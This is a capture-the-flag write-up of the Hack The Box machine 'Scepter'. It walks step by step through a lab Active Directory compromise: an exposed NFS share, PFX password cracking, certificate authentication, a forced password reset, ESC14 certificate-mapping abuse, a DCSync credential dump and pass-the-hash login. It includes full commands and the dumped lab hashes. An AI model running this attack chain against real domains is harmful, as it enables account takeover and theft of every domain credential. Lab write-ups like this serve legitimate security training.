Hackthebox: Scepter

Overview

Scepter is a hard-difficulty machine from Hack The Box that deals initially with an exposed rpc endpoint that we can mount onto our machine providing us with keys and certificates to impersonate d.baker user. We’ll then abuse ForceChangePassword to get a.carter who can abuse ESC14 and get h.brown which will re-abuse the vulnerable template again to land access on p.adams who has DCSync privileges.

Scepter-info-card

Reconnaissance

We can see rpcbind on port 111 with nfs (network file system), then we can mount it :

┌──(kali㉿kali)-[~]
└─$ rpcinfo  -p 10.10.11.65
   program vers proto   port  service
    100000    2   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    4   udp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    4   tcp    111  portmapper
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   tcp   2049  nfs
    100005    1   tcp   2049  mountd
    100005    2   tcp   2049  mountd
    100005    3   tcp   2049  mountd
    100005    1   udp   2049  mountd
    100005    2   udp   2049  mountd
    100005    3   udp   2049  mountd
    100021    1   tcp   2049  nlockmgr
    100021    2   tcp   2049  nlockmgr
    100021    3   tcp   2049  nlockmgr
    100021    4   tcp   2049  nlockmgr
    100021    1   udp   2049  nlockmgr
    100021    2   udp   2049  nlockmgr
    100021    3   udp   2049  nlockmgr
    100021    4   udp   2049  nlockmgr
    100024    1   tcp   2049  status
    100024    1   udp   2049  status

Now we mount it:

┌──(kali㉿kali)-[~]
└─$ showmount -e 10.10.11.65    
Export list for 10.10.11.65:
/helpdesk (everyone)
                     

┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ sudo mount -t nfs 10.10.11.65:/helpdesk nfs_share
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ sudo su          
┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter]
└─# cd nfs_share       
                                                                                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter/nfs_share]
└─# ls                        
baker.crt  baker.key  clark.pfx  lewis.pfx  scott.pfx

We find the user baker‘s certs and keys, we can use openssl to create a certificate that we can use to auth as the user:

┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter/nfs_share]
└─# openssl pkcs12 -export -out d.baker.pfx -inkey baker.key -in baker.crt
Enter pass phrase for baker.key:
Enter pass phrase for baker.key:
Enter pass phrase for baker.key:
Could not find private key from -inkey file from baker.key
4087DAB95F7F0000:error:1608010C:STORE routines:ossl_store_handle_load_result:unsupported:../crypto/store/store_result.c:151:
4087DAB95F7F0000:error:07880109:common libcrypto routines:do_ui_passphrase:interrupted or cancelled:../crypto/passphrase.c:178:
4087DAB95F7F0000:error:1C80009F:Provider routines:epki2pki_decode:unable to get passphrase:../providers/implementations/encode_decode/decode_epki2pki.c:121:
                                           

But now we need a password for the pfx file, we can do so using pfx2john:

┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter]
└─#  john  -w=/usr/share/wordlists/rockyou.txt pfx_hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 256 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
newpassword      (clark.pfx)     
1g 0:00:00:00 DONE (2025-04-22 18:57) 2.040g/s 10448p/s 10448c/s 10448C/s Liverpool..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

And now we decrypt it:

┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter/nfs_share]
└─# openssl pkcs12 -export -out ../d.baker.pfx -inkey baker.key -in baker.crt
Enter pass phrase for baker.key:
Enter Export Password:
Verifying - Enter Export Password:

The password is newpassword.

And now we can use that cert to authenticate as d.baker and get his hash:

┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter]
└─# ntpdate scepter.htb      
2025-04-23 03:00:43.437361 (+0000) +28805.743118 +/- 0.026259 scepter.htb 10.10.11.65 s1 no-leap
CLOCK: time stepped by 28805.743118
                                                                                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter]
└─# certipy-ad auth -pfx d.baker.pfx  -dc-ip '10.10.11.65' -username 'd.baker' -domain 'scepter.htb'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce
                                                     

Now we can start our enumeration using bloodhound-python:

┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ bloodhound-python -u 'd.baker' --hashes ':18b5fb0d99e7a475316213c15b6f22ce' -ns 10.10.11.65 -d scepter.htb  -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 27S
INFO: Compressing output into 20250423032837_bloodhound.zip

We can see that d.baker user can change a.carter’s password

ForceChangePassword

┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ sudo ntpdate scepter.htb
2025-04-23 04:31:52.887861 (+0000) +2744.807951 +/- 0.025757 scepter.htb 10.10.11.65 s1 no-leap
CLOCK: time stepped by 2744.807951
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ getTGT.py -no-pass -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in [email protected]
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ export [email protected] 
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip 10.10.11.65 set password a.carter Password123!
[+] Password changed successfully!

Later we can see a.carter is a member of IT Support who have GenericAll on STAFF ACCESS CERTIFICATE:

ForceChangePassword

So first I add GenericAll to a.carter:

                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ bloodyAD -d scepter.htb -u a.carter -p Password123! --host dc01.scepter.htb --dc-ip 10.10.11.65 add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB

Then looking at vulnerable certificates using certipy:

1
  Template Name                       : StaffAccessCertificate
  Display Name                        : StaffAccessCertificate
  Certificate Authorities             : scepter-DC01-CA
  Enabled                             : True
  Client Authentication               : True
  Enrollment Agent                    : False
  Any Purpose                         : False
  Enrollee Supplies Subject           : False
  Certificate Name Flag               : SubjectRequireEmail
                                        SubjectRequireDnsAsCn
                                        SubjectAltRequireEmail
  Enrollment Flag                     : NoSecurityExtension
                                        AutoEnrollment
  Private Key Flag                    : 16842752
  Extended Key Usage                  : Client Authentication
                                        Server Authentication
  Requires Manager Approval           : False
  Requires Key Archival               : False
  Authorized Signatures Required      : 0
  Validity Period                     : 99 years
  Renewal Period                      : 6 weeks
  Minimum RSA Key Length              : 2048
  Permissions
    Enrollment Permissions
      Enrollment Rights               : SCEPTER.HTB\staff
    Object Control Permissions
      Owner                           : SCEPTER.HTB\Enterprise Admins
      Full Control Principals         : SCEPTER.HTB\Domain Admins
                                        SCEPTER.HTB\Local System
                                        SCEPTER.HTB\Enterprise Admins
      Write Owner Principals          : SCEPTER.HTB\Domain Admins
                                        SCEPTER.HTB\Local System
                                        SCEPTER.HTB\Enterprise Admins
      Write Dacl Principals           : SCEPTER.HTB\Domain Admins
                                        SCEPTER.HTB\Local System
                                        SCEPTER.HTB\Enterprise Admins
      Write Property Principals       : SCEPTER.HTB\Domain Admins
                                        SCEPTER.HTB\Local System
                                        SCEPTER.HTB\Enterprise Admins

If we enum certs we will find StaffAccessCertificate cert with SubjectAltRequireEmail and NoSecurityExtension, also the altSecurityIdentities : {X509:h.brown@scepter.htb } set for the h.brown user which means we can perform the attack mentioned here: https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9#4a82

┌──(kali㉿kali)-[~]
└─$ ldapsearch -x -H ldap://scepter.htb -D '[email protected]' -w 'Password123!' -b "dc=scepter,dc=htb" "(sAMAccountName=h.brown)" altSecurityIdentities

# extended LDIF
#
# LDAPv3
# base <dc=scepter,dc=htb> with scope subtree
# filter: (sAMAccountName=h.brown)
# requesting: altSecurityIdentities 
#

# h.brown, Users, scepter.htb
dn: CN=h.brown,CN=Users,DC=scepter,DC=htb
altSecurityIdentities: X509:<RFC822>[email protected]

# search reference
ref: ldap://ForestDnsZones.scepter.htb/DC=ForestDnsZones,DC=scepter,DC=htb

# search reference
ref: ldap://DomainDnsZones.scepter.htb/DC=DomainDnsZones,DC=scepter,DC=htb

# search reference
ref: ldap://scepter.htb/CN=Configuration,DC=scepter,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

Now we will set d.baker’s mail attribute to match that of the target user (h.brown) for authentication spoofing:

┌──(kali㉿kali)-[~]
└─$ bloodyAD -d scepter.htb -u a.carter -p Password123! --host dc01.scepter.htb set object d.baker mail -v [email protected]
[+] d.baker's mail has been updated
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ certipy-ad req -username "[email protected]" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate' 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ certipy-ad req -username "[email protected]" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'd.baker.pfx'
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ certipy-ad auth -pfx d.baker.pfx -domain scepter.htb -dc-ip 10.10.11.65 -username h.brown 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=h.brown.ccache

basically we can request a cert on behalf of whatever user’s email is used.

Now checking h.brown’s permissions:

┌──(kali㉿kali)-[~]
└─$ bloodyAD --host dc01.scepter.htb -d scepter.htb -u h.brown -k get writable --detail

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=scepter,DC=htb
url: WRITE
wWWHomePage: WRITE

distinguishedName: CN=h.brown,CN=Users,DC=scepter,DC=htb
thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
msDS-cloudExtensionAttribute6: WRITE
msDS-cloudExtensionAttribute5: WRITE
msDS-cloudExtensionAttribute4: WRITE
msDS-cloudExtensionAttribute3: WRITE
msDS-cloudExtensionAttribute2: WRITE
msDS-cloudExtensionAttribute1: WRITE
msDS-GeoCoordinatesLongitude: WRITE
msDS-GeoCoordinatesLatitude: WRITE
msDS-GeoCoordinatesAltitude: WRITE
msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE
msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
msPKIRoamingTimeStamp: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
url: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
assistant: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
homePostalAddress: WRITE
personalTitle: WRITE
wWWHomePage: WRITE
otherHomePhone: WRITE
streetAddress: WRITE
otherPager: WRITE
info: WRITE
otherTelephone: WRITE
userCertificate: WRITE
preferredDeliveryMethod: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE

distinguishedName: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
altSecurityIdentities: WRITE

h.brown can altSecuirtyIdentities of p.adams

We can do that from an evil-winrm shell:

*Evil-WinRM* PS C:\Users\h.brown\Documents> Set-ADUser -Identity "p.adams" -Add @{'altSecurityIdentities'='X509:<RFC822>[email protected]'}
*Evil-WinRM* PS C:\Users\h.brown\Documents> Get-ADUser -Identity p.adams -Properties altSecurityIdentities


altSecurityIdentities : {X509:<RFC822>[email protected]}
DistinguishedName     : CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
Enabled               : True
GivenName             : p.adams
Name                  : p.adams
ObjectClass           : user
ObjectGUID            : a7ce1414-7b8e-41b7-9725-3686e4ed80a7
SamAccountName        : p.adams
SID                   : S-1-5-21-74879546-916818434-740295365-1109
Surname               :
UserPrincipalName     : [email protected]

now again

┌──(kali㉿kali)-[~]
└─$ getTGT.py -dc-ip 10.10.11.65 -hashes ':18b5fb0d99e7a475316213c15b6f22ce' scepter.htb/d.baker
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in d.baker.ccache
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=d.baker.ccache
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip 10.10.11.65 set password a.carter Password123!
[+] Password changed successfully!
┌──(kali㉿kali)-[~]
└─$ bloodyAD -d scepter.htb -u a.carter -p Password123! --host dc01.scepter.htb --dc-ip 10.10.11.65 add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB

Now set the mail attribute of d.baker to a spoofed value (pain@scepter.htb ) for another impersonation:

┌──(kali㉿kali)-[~]
└─$ bloodyAD --host dc01.scepter.htb -d scepter.htb -u a.carter -p 'Password123!' set object d.baker mail -v [email protected]
[+] d.baker's mail has been updated

Now request a new certificate for d.baker with updated mail spoof:

┌──(kali㉿kali)-[~]
└─$ certipy-ad  req -username [email protected] -hashes 18b5fb0d99e7a475316213c15b6f22ce -ca scepter-DC01-CA -template StaffAccessCertificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'd.baker.pfx'
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ certipy-ad auth -pfx 'd.baker.pfx' -domain 'scepter.htb' -username 'p.adams' 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0
                                                

Now we can see that p.adams is a member of REPLICATION OPERATORS:

BloodHound

So we can directly dump credentials with him and get administrator access: (DcSync)

┌──(kali㉿kali)-[~]
└─$ secretsdump.py -k DC01.scepter.htb                          
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:cc5d676d45f8287aef2f1abcd65213d9575c86c54c9b1977935983e28348bcd5
Administrator:aes128-cts-hmac-sha1-96:bb557b22bad08c219ce7425f2fe0b70c
Administrator:des-cbc-md5:f79d45bf688aa238
krbtgt:aes256-cts-hmac-sha1-96:5d62c1b68af2bb009bb4875327edd5e4065ef2bf08e38c4ea0e609406d6279ee
krbtgt:aes128-cts-hmac-sha1-96:b9bc4dc299fe99a4e086bbf2110ad676
krbtgt:des-cbc-md5:57f8ef4f4c7f6245
scepter.htb\d.baker:aes256-cts-hmac-sha1-96:6adbc9de0cb3fb631434e513b1b282970fdc3ca089181991fb7036a05c6212fb
scepter.htb\d.baker:aes128-cts-hmac-sha1-96:eb3e28d1b99120b4f642419c99a7ac19
scepter.htb\d.baker:des-cbc-md5:2fce8a3426c8c2c1
scepter.htb\a.carter:aes256-cts-hmac-sha1-96:90594ff6a706542e6e5f83a4f8108dc9f203b2fa12d512cdc7180ba41fd46c38
scepter.htb\a.carter:aes128-cts-hmac-sha1-96:a875ed3af2f895dfc8940fdc48eac5ea
scepter.htb\a.carter:des-cbc-md5:3d267fd95eab6883
scepter.htb\h.brown:aes256-cts-hmac-sha1-96:5779e2a207a7c94d20be1a105bed84e3b691a5f2890a7775d8f036741dadbc02
scepter.htb\h.brown:aes128-cts-hmac-sha1-96:1345228e68dce06f6109d4d64409007d
scepter.htb\h.brown:des-cbc-md5:6e6dd30151cb58c7
scepter.htb\p.adams:aes256-cts-hmac-sha1-96:0fa360ee62cb0e7ba851fce9fd982382c049ba3b6224cceb2abd2628c310c22f
scepter.htb\p.adams:aes128-cts-hmac-sha1-96:85462bdef70af52770b2260963e7b39f
scepter.htb\p.adams:des-cbc-md5:f7a26e794949fd61
scepter.htb\e.lewis:aes256-cts-hmac-sha1-96:1cfd55c20eadbaf4b8183c302a55c459a2235b88540ccd75419d430e049a4a2b
scepter.htb\e.lewis:aes128-cts-hmac-sha1-96:a8641db596e1d26b6a6943fc7a9e4bea
scepter.htb\e.lewis:des-cbc-md5:57e9291aad91fe7f
scepter.htb\o.scott:aes256-cts-hmac-sha1-96:4fe8037a8176334ebce849d546e826a1248c01e9da42bcbd13031b28ddf26f25
scepter.htb\o.scott:aes128-cts-hmac-sha1-96:37f1bd1cb49c4923da5fc82b347a25eb
scepter.htb\o.scott:des-cbc-md5:e329e37fda6e0df7
scepter.htb\M.clark:aes256-cts-hmac-sha1-96:a0890aa7efc9a1a14f67158292a18ff4ca139d674065e0e4417c90e5a878ebe0
scepter.htb\M.clark:aes128-cts-hmac-sha1-96:84993bbad33c139287239015be840598
scepter.htb\M.clark:des-cbc-md5:4c7f5dfbdcadba94
DC01$:aes256-cts-hmac-sha1-96:4da645efa2717daf52672afe81afb3dc8952aad72fc96de3a9feff0d6cce71e1
DC01$:aes128-cts-hmac-sha1-96:a9f8923d526f6437f5ed343efab8f77a
DC01$:des-cbc-md5:d6923e61a83d51ef
[*] Cleaning up... 
                     

And now fetch our root flag:

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i dc01.scepter.htb  -u administrator -H a291ead3493f9773dc615e66c2ea21c4            
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                 
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                                                   
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/root.txt
4d44c8793e7ff83f2a5673fd718eeb03
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

That was it for scepter, hope you learned something new!

-0xkujen